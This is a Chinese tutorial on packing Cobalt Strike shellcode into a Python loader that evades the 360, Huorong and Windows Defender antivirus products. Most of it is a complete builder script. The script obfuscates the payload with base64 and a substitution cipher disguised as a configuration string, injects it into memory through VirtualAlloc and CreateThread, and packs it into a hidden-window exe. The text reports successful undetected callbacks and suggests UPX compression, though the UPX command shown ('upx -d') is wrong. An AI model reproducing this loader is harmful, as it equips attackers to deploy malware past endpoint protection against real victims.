python过杀软新
利用python加载shellcode过360、火绒等杀软
先上代码
将以下代码保存到 mt.py
shell
import base64
import os
import shutil
buf = b"这里替换shellcode"
b64buf = base64.b64encode(buf)
lzsds = """
import ctypes
import base64
shellcode= base64.b64decode(\""""+b64buf.decode()+"""\")
shellcode= bytearray(shellcode)
ctypes.windll.kernel32.VirtualAlloc.restype= ctypes.c_uint64
ptr= ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf= (ctypes.c_char *len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
handle= ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
"""
def arraydecode(rr):
list_char = "This is a configuration file please do not delete,=configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967=)"
# 数组加密
index_b = []
for i in str(rr):
index_a = list_char.index(str(i))
index_b.append(index_a)
return index_b
ba64lzsds = base64.b64encode(lzsds.encode("utf-8")).decode()
sdata = arraydecode(ba64lzsds)
#打包
with open("note.py",'w',encoding="utf-8") as f:
f.write("""import base64
import ctypes
import os
"""+"\n")
f.write("data = "+str(sdata)+"\n")
f.write("""def j(index_b):
list_char = "This is a configuration file please do not delete,=configuration No 'bjABkmpxyz-RSUOPQVEFGHIJKLMWXYZ_3102qvw485CD967=)"
index_c = ""
for i in index_b:
index_c += list_char[i]
return index_c
data_j = j(data)
code = base64.b64decode(data_j).decode('utf-8')
exec(code)
""")
import PyInstaller.__main__
try:
# 获取要打包的脚本路径
script_file = "note.py"
# 获取 PyInstaller 路径
pyinstaller_path = os.path.dirname(PyInstaller.__main__.__file__)
# 设置打包选项
build_args = [
"-F", # 生成一个单独的可执行文件
"-w", # 不显示命令行窗口
"-i=1.ico", # ico
script_file # 添加要打包的脚本路径
]
# 执行打包命令
PyInstaller.__main__.run(build_args)
except:
print("exe在dist文件夹内")
shutil.rmtree("build")
shutil.rmtree("__pycache__")
os.remove("note.spec")
os.remove("note.py")
如何使用
1、使用cs生成python的payload替换掉mt.py代码中shellcode
2、准备一个ico图标,放在和mt.py同一目录命名为1.ico,这点可以自行修改。
一键生成
替换掉代码里的shellcode之后,直接运行
shell
python 文件名.py
exe会生成在在当前目录的dist目录下
动态上线-成功
复制到我的另一台电脑,开启360核晶和windwos defender
复制过去,无检测拦截
双击运行,360无拦截成功上线,火绒也能过
主动查杀-成功
有时候会检测到存在python的特征会报毒,但是运行不影响上线,可以使用upx进行压缩,去除python的特征
upx下载地址 https://github.com/upx/upx
shell
压缩命令
upx -d note.exe